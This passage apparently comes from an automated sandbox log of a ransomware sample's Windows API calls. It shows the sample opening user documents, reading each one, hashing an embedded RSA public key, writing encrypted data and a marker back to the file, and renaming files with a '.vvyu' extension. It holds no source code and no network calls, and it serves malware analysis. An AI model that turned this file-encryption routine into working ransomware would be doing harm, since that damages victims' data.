Size=0x204) returned 0x2d08630 [0196.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f48 | out: hHeap=0x620000) returned 1 [0196.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0196.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f78 | out: hHeap=0x620000) returned 1 [0196.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0196.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0196.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0196.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0196.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ee8 | out: hHeap=0x620000) returned 1 [0196.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0196.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0196.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0196.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0196.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0196.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0196.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0196.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0196.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0196.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0196.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0196.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f18 | out: hHeap=0x620000) returned 1 [0196.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f60 | out: hHeap=0x620000) returned 1 [0196.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0196.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f00 | out: hHeap=0x620000) returned 1 [0196.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ed0 | out: hHeap=0x620000) returned 1 [0196.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0196.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0196.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0196.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2eb8 | out: hHeap=0x620000) returned 1 [0196.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1968 | out: hHeap=0x620000) returned 1 [0196.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0196.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0196.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0196.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0196.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0196.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0196.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0196.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0196.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0196.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0196.643] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x75e8, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x75e8, lpOverlapped=0x0) returned 1 [0196.644] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0196.644] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x75ed, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.644] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0196.644] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0196.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0196.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0196.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0196.645] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.645] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0196.645] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0196.645] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0196.645] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.645] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0196.646] CloseHandle (hObject=0x568) returned 1 [0196.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0196.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea6a68 [0196.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0196.648] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\yTkydbos.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\ytkydbos.xlsx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\yTkydbos.xlsx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\ytkydbos.xlsx.vvyu")) returned 1 [0196.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.650] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6a53e0 | out: hHeap=0x620000) returned 1 [0196.652] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15b2a0b0, ftCreationTime.dwHighDateTime=0x1d89bdf, ftLastAccessTime.dwLowDateTime=0x5545ada0, ftLastAccessTime.dwHighDateTime=0x1d89cf5, ftLastWriteTime.dwLowDateTime=0x5545ada0, ftLastWriteTime.dwHighDateTime=0x1d89cf5, nFileSizeHigh=0x0, nFileSizeLow=0xeaef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z99M8Y1GRoOyuotMz.csv", cAlternateFileName="Z99M8Y~1.CSV")) returned 1 [0196.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x6a53e0 [0196.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.653] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\z99M8Y1GRoOyuotMz.csv") returned=".csv" [0196.653] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\z99M8Y1GRoOyuotMz.csv" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\z99m8y1grooyuotmz.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0196.653] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=60143) returned 1 [0196.653] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0196.656] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xeac9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.656] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0196.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0196.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.658] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.658] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xeaef, lpOverlapped=0x0) returned 1 [0196.659] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0196.659] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.659] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.659] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0196.660] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0196.660] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.660] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0196.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0196.660] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0196.660] GetLastError () returned 0x0 [0196.660] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0196.660] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0196.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0196.661] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0196.661] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0196.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0196.661] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0196.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0196.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeaf0) returned 0x2ea79b0 [0196.661] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0196.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0196.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0196.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0196.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0196.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1968 [0196.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2eb8 [0196.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea19b0 [0196.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ed0 [0196.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f00 [0196.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f60 [0196.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f18 [0196.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0196.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0196.662] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0196.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0196.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f00 | out: hHeap=0x620000) returned 1 [0196.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f18 | out: hHeap=0x620000) returned 1 [0196.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f60 | out: hHeap=0x620000) returned 1 [0196.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0196.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f60 [0196.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0196.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f18 [0196.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0196.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2f00 [0196.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0196.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0196.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0196.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0196.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0196.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0196.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0196.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0196.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0196.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f18 | out: hHeap=0x620000) returned 1 [0196.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f00 | out: hHeap=0x620000) returned 1 [0196.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0196.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0196.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f60 | out: hHeap=0x620000) returned 1 [0196.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0196.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0196.664] GetCurrentThreadId () returned 0x66c [0196.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0196.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea5650 [0196.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0196.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0196.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0196.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0196.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0196.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0196.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.665] GetCurrentThreadId () returned 0x66c [0196.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0196.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0196.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0196.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0196.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccad98 [0196.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0196.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0196.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0196.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f60 [0196.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0196.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0196.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0196.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0196.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0196.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0196.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0196.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f00 [0196.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0196.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0196.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0196.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0196.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0196.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0196.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f18 [0196.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0196.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0196.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0196.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ee8 [0196.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0196.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f78 [0196.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0196.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0196.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f48 [0196.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f30 [0196.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 